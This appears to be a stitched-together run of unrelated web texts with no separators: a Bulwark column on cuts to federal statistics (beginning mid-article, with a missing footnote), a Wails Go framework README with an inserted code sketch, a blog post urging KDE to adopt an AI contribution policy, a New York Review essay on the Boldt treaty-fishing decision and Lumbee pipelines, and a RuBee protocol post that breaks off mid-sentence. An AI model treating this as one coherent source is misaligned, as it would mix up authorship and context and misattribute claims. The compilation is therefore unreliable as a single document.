That’s because yesterday, to relatively little fanfare, the U.S. Bureau of Economic Analysis announced it was discontinuing some of its data collection on foreign investment in the United States as part of its “ongoing streamlining initiatives.” This follows previous announcements from the BEA in recent months about how it was paring back other data collection on foreign direct investment due to “resource constraints.”
In the absence of data, I guess we’ll simply have to trust Trump when he says that he’s delivered.
Now, do I think Trump directed the BEA to eliminate these measures specifically to make it easier for him to bullshit about his dealmaking prowess? Not exactly. While there are some cases where the administration has leaned on statistical agencies or explicitly censored their findings, the more common and less visible tactic has been to just defund them.
Trump’s fiscal year 2026 budget request for the Bureau of Economic Analysis reflects a 20 percent reduction compared to last year, a target that agency staff have told me they’ve already hit thanks to DOGE cuts, early retirements, and hiring freezes. (The comms team at BEA—like most statistical agency press offices I’ve contacted in recent months—has declined to confirm or deny these numbers.) This has forced the BEA to make tough choices. The agency also is responsible for producing much higher-profile, market-moving data, such as the reports on GDP, consumer spending, and the Federal Reserve’s preferred measure of inflation. Something had to give, and this week, that something was data on foreign investment.
Other major statistical agencies are struggling with their own brain drains and funding cuts.
Take the Bureau of Labor Statistics, which releases data on the job market and prices, among other marquee measures. In August, Trump’s decision to fire Erika McEntarfer, the BLS commissioner, grabbed headlines,² but the top job is hardly the only hole this administration has blown in that agency. At the time of McEntarfer’s firing, a third of senior BLS leadership positions were already vacant. (That’s still the case, in fact.)
The rest of the agency has been swiss-cheesed too. Some regional field offices—such as the consumer price index offices in Buffalo, New York; Lincoln, Nebraska; and Provo, Utah—have been shuttered entirely. Meanwhile, post-COVID, the agency was already struggling with reduced survey-response rates, which have made its numbers noisier and more susceptible to big revisions. The administration’s response has been to disband the task force working to fix these problems.
The result is that federal data are being degraded—or deleted altogether. And deletion is especially common when statistical series measure issues that this administration would rather not track.
In September, for instance, the administration canceled a three-decade-old annual survey that measures how many Americans struggle to get enough food. A few months earlier, HHS eliminated the team that produces the poverty guidelines, which determine how we count the number of people in poverty and eligibility for benefits such as SNAP, Medicaid, Head Start, and childcare subsidies. But hey, if you never determine who’s eligible for benefits, maybe that means no one is.
Lots of people might take these numbers for granted, but we’ll notice when they’re gone. We need these data to interpret the world around us and make decisions. Consumers use them to track the weather, determine where to send their kids to school, and negotiate raises. Businesses use them to hire, invest, price, and purchase. Doctors use them to diagnose illnesses. Public officials use them to craft policy.³ And voters use them to determine whether their elected officials are keeping their promises.
But instead of recognizing the usefulness of these data—or perhaps because he recognizes it—the president has chosen to curate his own reality.
As was the case last week, when the White House cheerily announced that inflation had fallen because DoorDash’s breakfast offerings had gotten cheaper, and because Walmart had shrinkflationed its Thanksgiving dinner deal. Maybe this seemed forgivable when government agencies were shut down and everyone was looking for alternative measures to fill the statistical void. My fear is that the voids are multiplying.
¹ Boosting foreign direct investment in the United States is a somewhat bizarre thing for Trump to fixate on, since higher FDI mathematically increases our trade deficits. Which Trump believes are already catastrophically high. But whatever, not like Trump has a Wharton degree.
³ “I would not want anyone to think the data have deteriorated to a point where it’s difficult for us to understand the economy,” Federal Reserve Chair Jerome Powell said in a June Senate hearing. “But the direction of travel is concerning.”
Catherine Rampell is economics editor at The Bulwark and an anchor at MS NOW (formerly MSNBC). She specializes in economics, politics, public policy, and immigration. She was previously at the Washington Post, the New York Times, CNN, and PBS NewsHour.
The Bulwark was founded to provide analysis and reporting in defense of America’s liberal democracy.
We publish written articles and newsletters. We create podcasts and YouTube videos. We give political analysis from experts who have spent their lives in the business.
Some of what we do is behind a paywall. Most of what we do is not. That’s because we are a mission-based organization first and a business second.
And you can’t help save democracy from behind a paywall.
Build desktop applications using Go and Web Technologies
The traditional method of providing web interfaces to Go programs is via a built-in web server. Wails offers a different
approach: it provides the ability to wrap both Go code and a web frontend into a single binary. Tools are provided to
make this easy for you by handling project creation, compilation and bundling. All you have to do is get creative!
Features
Use standard Go for the backend
Use any frontend technology you are already familiar with to build your UI
Quickly create rich frontends for your Go programs using pre-built templates
Easily call Go methods from JavaScript (see the sketch after this list)
Auto-generated TypeScript definitions for your Go structs and methods
Native Dialogs & Menus
Native Dark / Light mode support
Supports modern translucency and "frosted window" effects
Unified eventing system between Go and JavaScript
Powerful CLI tool to quickly generate and build your projects
Multiplatform
Uses native rendering engines - no embedded browser!
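To make the Go-to-JavaScript bridge concrete, here is a minimal sketch of a bound struct, written against the Wails v2 API as I understand it; the struct name, the Greet method, the window title, and the frontend/dist embed path are illustrative choices, not taken from this README:

```go
package main

import (
	"embed"

	"github.com/wailsapp/wails/v2"
	"github.com/wailsapp/wails/v2/pkg/options"
	"github.com/wailsapp/wails/v2/pkg/options/assetserver"
)

// Frontend assets built by your JS tooling; the path is illustrative.
//
//go:embed all:frontend/dist
var assets embed.FS

// App is ordinary Go; its exported methods are what get exposed to the frontend.
type App struct{}

// Greet is a plain Go method. Wails generates JavaScript/TypeScript bindings
// for it, with the TypeScript signature derived from the Go types.
func (a *App) Greet(name string) string {
	return "Hello " + name + "!"
}

func main() {
	app := &App{}
	// Run wraps the Go backend and the web frontend into a single window/binary.
	err := wails.Run(&options.App{
		Title:       "demo",
		AssetServer: &assetserver.Options{Assets: assets},
		Bind:        []interface{}{app}, // make App's methods callable from JS
	})
	if err != nil {
		panic(err)
	}
}
```

On the frontend, the generated bindings are promise-based, so the call ends up looking roughly like Greet("World").then(console.log) via the generated wailsjs module.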
Roadmap
The project roadmap may be found here. Please consult it before creating an enhancement request.
This project is supported by these kind people / companies:
FAQ
Is this an alternative to Electron?
Depends on your requirements. It's designed to make it easy for Go programmers to make lightweight desktop
applications or add a frontend to their existing applications. Wails does offer native elements such as menus
and dialogs, so it could be considered a lightweight Electron alternative.
Who is this project aimed at?
Go programmers who want to bundle an HTML/JS/CSS frontend with their applications, without resorting to creating a
server and opening a browser to view it.
What's with the name?
When I saw WebView, I thought "What I really want is tooling around building a WebView app, a bit like Rails is to
Ruby". So initially it was a play on words (Webview on Rails). It just so happened to also be a homophone of the
English name for the country I am from. So it stuck.
Stargazers over time
Contributors
The contributors list is getting too big for the readme! All the amazing people who have contributed to this
project have their own page here.
License
Inspiration
This project was mainly coded to the following albums:
I've been using KDE Plasma for four and a half years. The community is sweet and the software is stellar, and I see a bright future for it. I want it to be the best it can be! So, I'd like to talk about a small incident that I want KDE to lean away from.
TL;DR: Please look at adopting an "AI" Policy similar to Servo's. Other projects' policies, like Asahi Linux's (they love KDE!) and Bevy's, may also be worth a look. Even Forgejo has its "AI" Agreement, though in my opinion it's a bit watered down.
A light exchange; or, the incident.
Before Nate made his response, I was also thinking about their old Real Name Policy. I thought it was kinda funny that KDE rejected pseudonyms for years for provenance reasons — and then felt they should accept LLM contributions even though a scraping LLM cannot ever have provenance.
Nate's reply then emulsifies these two positions. It seems his takeaway was not that pseudonyms have a negligible impact on provenance, but instead that provenance is impossible and so KDE should give up.
I find this odd? The logic doesn't sit well with me.
He's turned "We can't know that someone's using a real name, so we must openly accept fake names" into "We can't know that someone's not using an LLM, so we must openly accept LLM contributions."
But these statements don't evaluate the worth of pseudonyms or LLM code, and are instead purely defensive — "How practical is it to guarantee we avoid X?" (Which for almost any given X, the answer is "We can't guarantee much at all". People can lie on the internet!)
My 2¢ is that there are other reasons to consider not accepting something. For instance, it would be bad to say, "We can't know that someone's not a nazi, so we must openly accept nazi contributions."
Excuse the invocation of Godwin's Law. Obviously, I don't believe this is a position KDE would hold. I'm just underscoring the need to actually think about whether having X in a project is good, and what ought to be done if we find instead that it's bad.
So, are LLM contributions bad?
LLM Contributions Are Bad
As mentioned, LLMs trained on scraped data cannot ever give complete attribution. It's how they work; it's the party trick of a black box. It's also non-consensual use, and it's plagiarism.
Occasionally, an LLM will regurgitate/resynthesize author credit. Sometimes these authors are not real, or are unrelated to whatever content is attributed to them. And unless the output is a 1:1 match for their work, it's incomplete credit and still plagiarism.
Hypothetically, one could train a language model to only use public domain or consensually granted data, such as code you've written yourself. But, these tend to give poor results.
LLMs bring downward pressure on code quality, lost productivity, and maintainer abuse. LLM contributions are often accompanied by an erroneous, nonsensical, or blathering description. The contributor also tends to have little-to-no understanding of the contribution and cannot personally answer questions from the review process. This is a waste of maintainer time and labour, is disrespectful, and can lead to burnout.
I understand KDE has had some prior run-ins with "AI", such as Kdenlive's optional Whisper integration and a few in-progress chatbot clients. I'm not terribly fond of these, but right now I'd just like to see a plan for an "AI" contributions policy.
I'm not a decorated developer nor an expert on how not to feed into fascism, so please reach out to others to discuss. Reach out to the folks at Servo or Krita, or Bevy and Asahi Linux. Reach out to David Revoy. To Ed Zitron. To Andrew Roach. Anyone. See what people have already said, recap the ground we've already trod.
Heck, I'm sure Brodie Robertson could talk about similar projects who've had to wrestle with an "AI" Policy.
Anyway, thanks for taking the time to read. This is important to me, and you'll find it's important to many. Take care and best wishes!
The Third Sovereign
Portside
portside.org
2025-11-24 03:55:54
University of North Carolina Press, 291 pp., $99.00; $22.95 (paper)
Billy Frank Jr. was fourteen when, in December 1945, he was fishing for salmon in the Nisqually River near Olympia, Washington, and state game wardens arrested him for the first time. Over the next twenty-five years he was arrested (and often jailed) more than four dozen times, despite his airtight defense: he fished under the terms of the Medicine Creek Treaty of 1854, one of ten treaties negotiated by Governor Isaac Stevens in which the US promised tribes in the Puget Sound area of the Pacific Northwest the right to fish where they’d always fished “in common with all citizens of the Territory.”
In 1965 the intensity of the arrests changed. Frank was fishing the Nisqually with his brother-in-law when armed wardens in a high-speed motorboat rammed Frank’s cedar canoe. “They got all kinds of training and riot gear—shields, helmets, everything,” Frank told Charles Wilkinson back in the 1970s, when Wilkinson was a young attorney with the Native American Rights Fund. “These guys had a budget. This was a war.”
In the mid-1960s Frank was one of several young activists in the Pacific Northwest who had begun staging “fish-ins,” acts of protest inspired by Black civil rights sit-ins but, a participant wrote, “done in a distinctive Indian way.” Native activists, with their families and allies, fished at riverside encampments, pressing their own fishing rights against state fishing prohibitions, resulting in arrests and news coverage and increasing brutality on the part of the state. The violence peaked in the summer of 1970, when state and local police raided an encampment on the Puyallup River in Tacoma, using rifles, tear gas, and batons to arrest dozens of men, women, and children.
One of the bystanders gassed during the melee was Stan Pitkin, the US attorney for western Washington who, days later, filed a complaint, United States v. Washington, on behalf of tribes that had signed the so-called Stevens treaties. The four-year trial resulted in a resounding victory for tribal sovereignty in the United States, reasserting the tribes’ fishing rights under the treaties and affirming those treaties as living documents—a verdict known today as the Boldt decision, named for its author, Judge George Boldt.
Frank served as the chairman of the Northwest Indian Fisheries Commission, the organization established by the 1974 ruling to aid the tribes in managing fisheries—a post he held for more than thirty years. In 2013 he asked Wilkinson, his old friend, by then an expert in federal Indian law, to write a book about the case. Wilkinson died in 2023, but the book he completed, Treaty Justice, deftly lays out one of the twentieth century’s most significant and underestimated legal decisions. “Judge George Boldt’s ruling…is a landmark in the American civil rights movement,” Wilkinson writes. “It belongs in the same company as Brown v. Board of Education and a select few other court cases in terms of bringing justice to dispossessed peoples.”
The trial began with a question: What were the circumstances under which these Pacific Northwest tribal nations signed the treaties negotiated by Isaac Stevens? A Massachusetts-born army engineer, Mexican-American War veteran, and railroad surveyor, Stevens was appointed governor of the newly established Washington Territory by his fellow veteran President Franklin Pierce in 1853. US expansion had slowed while Congress debated slavery’s future in the new territories, though Pierce still coveted Alaska, Hawaii, and Cuba and was eager to quickly solidify possession of what would become Washington, Idaho, and part of Montana. In the Northwest, the Donation Land Act of 1850 and its companion legislation, the Oregon Indian Treaty Act, called for the territorial commissioners to extinguish Native claims—declaring them null and void for the sake of white settlement—a task Stevens took on with alacrity.
The tribal cultures and economies Stevens encountered in the Puget Sound area were as varied as the region’s ecology. Around what are today called the San Juan Islands, the Lummi set reef nets in kelp beds to catch salmon in the northern sound’s open waters. To the south, the Nisqually fished the rivers and managed the prairies, burning forest to encourage grazing habitat for deer and elk. On the Olympic Peninsula, the Quinault caught salmon in their glacial rivers while harvesting shellfish along the Pacific coast, and on the peninsula’s northwestern tip, the Makah, whose warriors had repelled British sailors a century earlier, also caught salmon in their tidal rivers but focused on halibut and famously whales.
From 1820 to 1840, Wilkinson explains in Treaty Justice, the tribes had managed to coexist peacefully with British traders. But as the late Nisqually historian Cecelia Svinth Carpenter noted in Stolen Lands: The Story of the Dispossessed Nisquallies (2007), “The peacefulness of the scene fast disappeared when American families started arriving and building fences around choice Nisqually land.”
Stevens’s initial plan was to move all the tribes to a single reservation, an idea they quickly rejected. George Gibbs, a Harvard-educated ethnographer, suggested that tribal leaders would consider multiple reservations if guaranteed “the right of taking fish, at all usual and accustomed grounds and stations…, and of erecting temporary houses for the purpose of curing, together with the privilege of hunting, gathering roots and berries, and pasturing their horses on open and unclaimed lands.”
The “final settlement,” as Stevens called it, was conducted in Chinook Jargon, a Pacific coast trade language of an estimated five hundred words, the effective use of which, a scholar noted, “depends on the ingenuity and imagination of the speaker.” Translating was Frank Shaw, a settler who, Wilkinson writes, “had only a moderate grasp of the Chinook Jargon and knew no Indigenous languages.”
Treaties were viewed by the US as a “temporary expedient,” in the words of the historian Alexandra Harmon, and in 1887 the General Allotment Act designated vast amounts of tribal land “surplus” based on the assumption that increasingly Americanized tribes would give up hunting and fishing communal lands for cultivating small private farms. Henry Dawes, the Massachusetts senator who wrote the act, saw collective ownership as Native America’s fatal flaw: “There is no selfishness, which is at the bottom of civilization.” Over the next half-century an estimated 90 million acres of Native land were taken by the US.
The effect of the Stevens treaties, for tribes in the Puget Sound area as elsewhere, was what Wilkinson calls “the long suppression.” “Native fishing rights, so central to tribal existence,” he explains, “were denied or scraped to the bone.” For decades private canneries and even dams decimated salmon runs, while US Indian agents forbade indigenous practices and sent Native children off to English-only Christian schools.
Then in 1953 the US adopted a new policy of “termination,” moving to end federal responsibilities to the tribes entirely, regardless of treaties. Within twenty years Congress terminated the recognition of 109 tribes in Oregon, California, Wisconsin, and elsewhere, affecting more than 11,000 Native people and taking upward of 1.3 million acres of land. No tribes were terminated in Washington state, but as salmon dwindled, commercial and sports fishermen focused state enforcement on tribal fishers—despite the fact that when Billy Frank’s canoe was rammed on the Nisqually by wardens in a speedboat, the tribes were taking only 6 percent of the total Puget Sound harvest.
In the 1950s and 1960s a confluence of events revitalized Indian country. Native American veterans returned from World War II and the Korean War and attended college; tribes took control of programs formerly administered by the Department of the Interior’s Bureau of Indian Affairs, in schools, hospitals, and resource management.
In the Puget Sound area, leaders of the Muckleshoot, Puyallup, and Nisqually Nations began to meet with attorneys about their fishing rights. In 1963 Makah leaders interviewed Al Ziontz, a Seattle lawyer, who said, “If I were representing the Makah Tribe, the principle of tribal sovereignty would be the way I would go about defending your rights.” Ziontz knew little about Indian law—no law school taught it, despite tribes being, after the federal and state governments, the third of the three sovereign powers in the US constitutional system. Sovereignty made the tribes, as Chief Justice John Marshall wrote in 1832, “distinct political communities, having territorial boundaries, within which their authority is exclusive.”
What happened next was a powerful mix of scholarship and organizing, with lawyers and activists tag-teaming to move the tribes toward a confrontation with the state. Hank Adams, an Assiniboine and Sioux activist who grew up on the Quinault Reservation—Wilkinson calls him “razor-sharp brilliant and driven”—set up at Frank’s Landing, a riverside encampment named for Billy Frank’s father, where, with Janet McCloud (Tulalip) and Ramona Bennett (Puyallup), he organized the Survival of the American Indian Association. Starting in 1964 the group turned fishing arrests into civil rights actions.
In the group’s first years celebrities (including Marlon Brando and Dick Gregory) were arrested at protests, as Adams organized support from Friends groups, Black Panthers, and the Southern Christian Leadership Conference. A planned five-day action at Frank’s Landing in 1968 lasted for months; in addition to eating the salmon they caught, the activists sold some to fund the encampment. By the time the police raided the Puyallup fish-in, in 1970, the young radicals were supported by the Puyallup tribal council, which sent a police force to protect the activists, who were fired on at random by vigilantes. On the day of the raid, Ramona Bennett said to game wardens approaching in a boat, “Touch our net and we’ll shoot you!”
In suing the State of Washington, Stan Pitkin, the Nixon-appointed US attorney, was working for what he called “a case to end all cases.” The time seemed right; two months before, Nixon had issued his special message to Congress on Indian affairs, which called for tribal “self-determination” and declared the termination policy “morally and legally unacceptable.” (Nixon, who advocated for land returns to tribes, counted his football coach at Whittier College, Wallace Newman, a Luiseño tribal citizen, as a mentor, but the president was likely also responding to Red Power actions, like the occupation of Alcatraz in 1969.) Judge Boldt was a bow-tie-wearing conservative who, just before the trial, had jailed Vietnam War protesters, making the tribes’ legal team nervous. But as the weeks passed, tribal attorneys sensed Boldt’s attentiveness and were relieved to spot Vine Deloria Jr.’s 1969 best seller, Custer Died for Your Sins: An Indian Manifesto, in his chambers.
For the first year of the trial, Judge Boldt took testimony on the treaties’ historical background. The State of Washington’s attorneys claimed that in 1854 the tribes were in “rapid cultural decline,” and they argued that the fishing rights defined by the Stevens treaties were moot. The plaintiffs’ expert—Barbara Lane, a Canadian anthropologist who had previously worked with numerous Northwest tribes—described a vibrant, adaptive culture, past and present. “They were not declining into nothing,” she said. Lane showed how the tribes had not only adapted to the new settlers but offered them ways to survive, with new kinds of food, shelter, and clothing. North of the Strait of Juan de Fuca, the British settlers in Victoria burned whale oil purchased from the Makah.
Next, twenty-nine tribal members testified to show that ancient cultural practices were also contemporary. Witnesses spoke in their own languages and recounted decades of abuse by Indian agents while displaying a generational fortitude that, trial participants noticed, captivated Boldt. There was also humor, another survival trait. Asked whether off-reservation fishing of winter chum salmon was prohibited by the state, Billy Frank said, “Well, I have been in jail enough times to say it probably is.”
As the trial progressed, a new facet of the case emerged: “the ambition,” Wilkinson writes, “of tribes to regulate their own members and to engage in salmon management.” Boldt’s ruling could add tribal oversight to federal and state oversight, and he now worked to decide whether the tribes could manage their own fisheries. The great revelation for nontribal citizens was that the tribes not only could but often already did so better than the region’s newcomers. In addition to a young Quinault fisheries expert finishing up his Ph.D., Boldt heard from Horton Capoeman, sixty-eight, who was bilingual and had lived on the Quinault Nation’s reservation his entire life, save for his US Army service. He had served on the tribal council, on the business committee, and as a tribal judge; his testimony detailed how the tribe had for generations managed Native and non-Native fishers when they either poached or overfished, by regulating timing or restricting access, depending on the offense. As Capoeman’s grandfather had told him, “It had to be done in order to bring them back to their senses.”
Boldt’s meticulousness, combined with a temporary assignment in Washington, D.C., meant that the trial stretched on, but at last on February 12, 1974—Lincoln’s birthday, a date Boldt chose to reflect what he saw as the decision’s significance—he upheld the tribes’ treaty rights and reinforced their status as sovereign entities. In straightforward, unsentimental language, he described the tribes’ “paramount dependence upon the products of an aquatic economy, especially anadromous fish, to sustain the Indian way of life.”
The decision was celebrated throughout Indian country. “In the 1960s there was a general belief in the public that treaties were ancient history, not the supreme law of the land,” said John Echohawk, the executive director of the Native American Rights Fund. “Our wish became true…. The treaties were acknowledged as the law. The Boldt Decision was the first big win for the modern tribal sovereignty movement.” A state official, meanwhile, compared the decision to a dictatorship. Bumper stickers read “Can Judge Boldt—not salmon.” Boldt, white Washingtonians argued, had made the majority population “second-class citizens,” denied equal rights.
A federal appeals court upheld the decision in 1975, but the Supreme Court declined to hear it for five years, a silence that exacerbated state officials’ anger and resulted in a salmon fishing free-for-all. Puget Sound was filled with white poachers ramming Indian boats, cutting nets, and slashing car tires (as they still do). At last the Supreme Court upheld the decision on July 2, 1979, quoting Boldt’s opinion repeatedly, as well as a 1905 case, United States v. Winans, which described the right to take salmon as “not much less necessary to the existence of the Indians than the atmosphere they breathed.” Washington state legislators were reprimanded. “Except for some desegregation cases,” the decision read, “the district court has faced the most concerted official and private efforts to frustrate a decree of a federal court witnessed in this century.”
In the years of the Pacific Northwest fish-ins, Sam Ervin, the North Carolina senator who led the Watergate hearings, had a reputation for fighting against civil rights legislation, though he nevertheless sponsored the Indian Civil Rights Act of 1968. Unbeknownst to many Americans, North Carolina is home to the largest population of Native Americans east of the Mississippi—a population that included Ervin’s staffer Helen Maynor Scheirbeck, a Lumbee from Robeson County. Scheirbeck also helped pass the 1972 Indian Education Act. Thanks to that law, in the late 1970s a Lumbee educator was brought into the North Carolina elementary school attended by Ryan E. Emanuel, whose book, On the Swamp: Fighting for Indigenous Environmental Justice, looks at the survival of indigenous communities along the southern coastal plain.
Emanuel is a hydrologist and a professor at Duke. He grew up in Charlotte, a city in the soft hills of North Carolina’s Piedmont region, spending summers “on the swamp”—the traditional Lumbee territory. “The place we come from is the crazy quilt of blackwater streams, floodplain forests, and sandy uplands that all drain to the Lumbee River,” Emanuel writes.
To be “on the swamp” means to be around Prospect, Saddletree, Burnt Swamp, Sandy Plains, Back Swamp, or one of the myriad other Lumbee communities arrayed across the Lumbee River basin.
The area is characterized by low-lying, hemlock-covered microclimates that are remnants of the just-glaciated past, what paleoecologists refer to as refugia.
By the time Isaac Stevens set out to extinguish Native rights in the Pacific Northwest, tribes in the Southeast (including the Cherokee, Chickasaw, and Choctaw) either had already been forcibly removed to what would become Oklahoma or were negotiating recognition in a society that acknowledged them reluctantly, if at all. Early encounters with settlers in the Southeast had destroyed communities with war and disease, but the Lumbee found a form of protection in the isolated swamps, their own refugia. “To settlers,” Emanuel writes, “they were unmapped places, interstitial lands. But to us, these places were home—backwaters amid swirling currents of colonialism.”
In On the Swamp, Emanuel uses his scientific training to gauge his homeland’s inscrutability to white settlers. In 2019 he compared nearly a hundred maps of the coastal plain created between the 1500s and the early 1900s and discovered that, prior to 1800, colonial mapmakers “generally did a poor job of representing the topology of the Lumbee River.” To miss the river’s “twisting, wandering channel” was to miss the “network of connected places” that makes up the Lumbee community—but it was this obscurity that afforded the Lumbee protection and, with an abundance of food and a strategic distance, strength. It was from a base in a Lumbee swamp that Henry Berry Lowry, a biracial freedom fighter and Lumbee hero, raided the Confederates during and after the Civil War, managing to avoid a sheriff’s hundred-man posse in 1871.
In the twentieth century, attacks came from railroad corporations, logging companies, and developers involved in wetland drainage projects that saw the luxuriously rich ecology of the swamps as merely, a local judge said in 1939, “noisome odors and unwholesome fogs.” Then in the 1950s natural gas came to Robeson County, and the land was suddenly valuable in another way—as an easement. “When Indigenous people today say that fossil fuel projects plow through their lands without regard for the well-being of communities and cultural landscapes, they are not exaggerating,” Emanuel writes. “They are speaking from generations of lived experience.”
Prospect, a town in Robeson County made up almost entirely of Native people, became a gas hub along the Transcontinental Pipeline, or TRANSCO, then the world’s longest gas pipeline, running from Texas to New York. Another hub was established near the historic site of Fort Nooheroka, where in 1713 a white militia had burned to death hundreds of Tuscarora people and enslaved hundreds more. (Many of the remaining Tuscarora soon relocated, joining the Haudenosaunee Confederacy in New York state.) These areas now include streams overwhelmed with animal waste from swine and poultry farms, and, Emanuel notes, “an ever-expanding tangle of gas pipelines and related infrastructure.”
But the Federal Energy Regulatory Commission (FERC) never asked the Lumbee for permission to run pipelines through their land. In 1956, two years before the digging began, Congress passed the Lumbee Act, which recognized the tribe as a sovereign entity. But termination was US Indian policy at the time, and a last-minute clause was added at the Bureau of Indian Affairs’ request, rendering the Lumbee legally invisible:
Nothing in this Act shall make such Indians eligible for any services performed by the United States for Indians because of their status as Indians, and none of the statutes of the United States which affect Indians because of their status as Indians shall be applicable to the Lumbee Indians.
This has caused real-life complications. In 2014, when a consortium of energy companies proposed a six-hundred-mile-long pipeline that would run from West Virginia to Robeson County, the chairman of the Lumbee Nation requested consultation, citing the Lumbee Act. The federal regulators sidestepped the tribe, citing the Lumbee Act, and in 2016 FERC concluded that “environmental justice populations would not be disproportionately affected” by the pipeline.
In 2017 Emanuel published a report in Science analyzing the route of the pipeline and showing how developers planned to clear-cut the swamp forests where the pipeline crossed water. Digging into the datasets buried in FERC’s appendixes, he also showed that while the Lumbee and other Native Americans made up just 1 percent of the population in the regions of West Virginia, Virginia, and North Carolina that the line would run through, they made up 5 percent of the people directly affected by its route. The pipeline was canceled in 2020, but had it been built, one in four Native Americans in North Carolina, or 30,000 people, would have lived along it—a population larger than that threatened by the Dakota Access Pipeline at Standing Rock.
Last March, Trump struck down a Biden executive order intended to strengthen tribal sovereignty. Yet even Biden’s order reads as aspirational; it suggested that the government consult with tribes “to ensure that Federal laws, policies, practices, and programs support Tribal Nations more effectively,” but consultation is not law. Deb Haaland, the Laguna Pueblo congresswoman from New Mexico who under Biden became the first indigenous secretary of the interior, oversaw the long-overdue accounting of the barbaric government-run Indian reservation boarding schools, including the uncovering of almost a thousand often unmarked graves. But in 2023, in that same position, she permitted ConocoPhillips’s $8 billion drilling plan on Alaska’s North Slope, the largest oil drilling project on public lands in US history, over the concerns of the Iñupiat mayor closest to the site, who noted that the previous year, during an uncontrolled ConocoPhillips gas release (“a unique event, with nothing similar ever occurring,” the corporation insisted), employees were evacuated while village residents were told they were safe.
This is not to say that the Trump administration, which aims to defund the federal agencies tribes rely on, won’t be worse than Biden. The government shutdown itself highlights the way the federal government funds its trust and treaty obligations through discretionary as opposed to mandatory funding for tribes, already the least well-funded among us, and the rush to extract everything from oil to rare earth minerals will hit indigenous lands hardest. But then the US government has a long, bipartisan, Constitution-sanctioned history of both taking Native territory and destroying it, denying imprisoned Native children their language in the process. Emanuel cites the United Nations special rapporteur on the rights of indigenous peoples, Victoria Tauli-Corpuz, who, after visiting western tribes in 2017, critiqued the US’s disregard for tribal sovereignty:
Sadly, I found the situation faced by the Standing Rock Sioux Tribe is shared by many other indigenous communities in the United States, as tribal communities nationwide wrestle with the realities of living in ground zero of energy impact.
The Boldt decision looked hard at a complicated history to map a new future for Native rights—and it worked. It is often cited as a first step toward the UN’s adoption in 2007 of the Declaration on the Rights of Indigenous Peoples. (The US was one of four “no” votes and the last holdout until late 2010, when Barack Obama agreed to support it, if only as an aspiration.) The autonomy allowed by Boldt helped the Olympic Peninsula’s Lower Elwha Klallam Tribe, whose elders had signed one of Stevens’s treaties, to, by 2014, take down the salmon-blocking dams that had been built on the Elwha River in 1910 by investors from Winnipeg and Chicago to power pulp mills. In 2023 the tribe held its first ceremonial salmon catch in decades. In California and Oregon, where the Yurok Tribe used its Boldt-era legal victories to regain its land and eventually take down dams on the Klamath River, salmon took only about a week to find their way to tributaries that had not had salmon in them for over half a century. “It feels like catharsis. It feels like we are on the right path. It gives me hope for the future,” Barry McCovey Jr., the director of the Yurok Tribe’s fisheries department, told the Associated Press.
Hope is a rare commodity, but if there is hope for the earth, generally it has to do with acknowledging indigenous sovereignty in the face of insatiable resource extraction. Indigenous people make up 6 percent of the world’s population, but their territory accounts for close to a quarter of the earth’s land surface, containing more than a third of remaining natural lands worldwide, often in northern boreal and equatorial forests. Tribes have built up a body of Indian law that is as dynamic as it is unacknowledged. “Tribal sovereignty is one of the most powerful and valuable public ideas that has ever touched my mind,” Wilkinson writes.
I say that, not just because of tribal sovereignty’s legal and intellectual worth, but because it also has proved to be so invincible. The world’s most powerful nation tried to terminate tribal sovereignty over the course of many generations, but could not because it meant so much to Indian people, small minority that they were, and they refused to give in.
Robert Sullivan’s books include Rats, The Meadowlands, and A Whale Hunt. His latest, Double Exposure: Resurveying the West with Timothy O’Sullivan, America’s Most Mysterious War Photographer, was published last year. (December 2025)
The New York Review
was launched during the New York City newspaper strike of 1963, when the magazine’s founding editors, Robert Silvers and Barbara Epstein, alongside Jason Epstein, Robert Lowell, and Elizabeth Hardwick, decided to start a new kind of publication—one in which the most interesting, lively, and qualified minds of the time could write about current books and issues in depth.
Readers responded by buying almost every copy and writing thousands of letters to demand that the Review continue. From the beginning, the editors were determined that the Review should be an independent publication; it began life as an editorial voice beholden to no one, and it remains so today.
Silvers and Epstein continued as co-editors until her death in 2006, and Silvers served as sole editor until his death in 2017. Since 2019 Emily Greenhouse has edited The New York Review, and it remains the magazine where, across twenty issues each year, the major voices in world literature and thought discuss books and ideas. In addition to the print magazine, the NYR Online publishes thorough and wide-ranging essays about politics national and global, film, art, and the cultural preoccupations of the day.
I have at least a few readers for whom the sound of a man's voice saying
"government cell phone detected" will elicit a palpable reaction. In
Department of Energy facilities across the country, incidents of employees
accidentally carrying phones into secure areas are reduced through a sort of
automated nagging. A device at the door monitors for the presence of a tag;
when the tag is detected it plays an audio clip. Because this is the government,
the device in question is highly specialized, fantastically expensive, and
says "government cell phone" even though most of the phones in question are
personal devices. Look, they already did the recording, they're not changing
it now!
One of the things that I love is weird little wireless networks. Long ago I
wrote about ANT+,
for example, a failed personal area network standard designed mostly around
fitness applications. There's tons of these, and they have a lot of
similarities---so it's fun to think about the protocols that went down a
completely different path. It's even better, of course, if the protocol is
obscure outside of an important niche. And a terrible website, too? What more
could I ask for.
The DoE's cell-phone nagging boxes, and an array of related but more critical
applications, rely on an unusual personal area networking protocol called RuBee.
RuBee is a product of Visible Assets Inc., or VAI, founded in 2004¹ by John K.
Stevens. Stevens seems a somewhat improbable founder, with a background in
biophysics and eye health, but he's a repeat entrepreneur. He's particularly fond of companies
called Visible: he founded Visible Assets after his successful tenure as CEO of
Visible Genetics. Visible Genetics was an early innovator in DNA sequencing, and
still provides a specialty laboratory service that sequences samples of HIV in
order to detect vulnerabilities to antiretroviral medications.
Clinical trials in the early 2000s exposed Visible Genetics to one of the more
frustrating parts of health care logistics: refrigeration. Samples being shipped
to the lab and reagents shipped out to clinics were both temperature sensitive.
Providers had to verify that these materials had stayed adequately cold throughout
shipping and handling, otherwise laboratory results could be invalid or incorrect.
Stevens became interested in technical solutions to these problems; he wanted
some way to verify that samples were at acceptable temperatures both in storage
and in transit.
Moreover, Stevens imagined that these sensors would be in continuous communication.
There's a lot of overlap between this application and personal area networks (PANs),
protocols like Bluetooth that provide low-power communications over short ranges.
There is also clear overlap with RFID; you can buy RFID temperature sensors.
VAI, though, coined the term visibility network to describe RuBee. That's
visibility as in asset visibility: somewhat different from Bluetooth or RFID,
RuBee as a protocol is explicitly designed for situations where you need to
"keep tabs" on a number of different objects. Despite the overlap with other
types of wireless communications, the set of requirements on a visibility network
have led RuBee down a very different technical path.
Visibility networks have to be highly reliable. When you are trying to keep
track of an asset, a failure to communicate with it represents a fundamental
failure of the system. For visibility networks, the ability to actually convey
a payload is secondary: the main function is just reliably detecting that
endpoints exist. Visibility networks have this in common with RFID, and indeed,
despite its similarities to technologies like BLE, RuBee is positioned mostly as
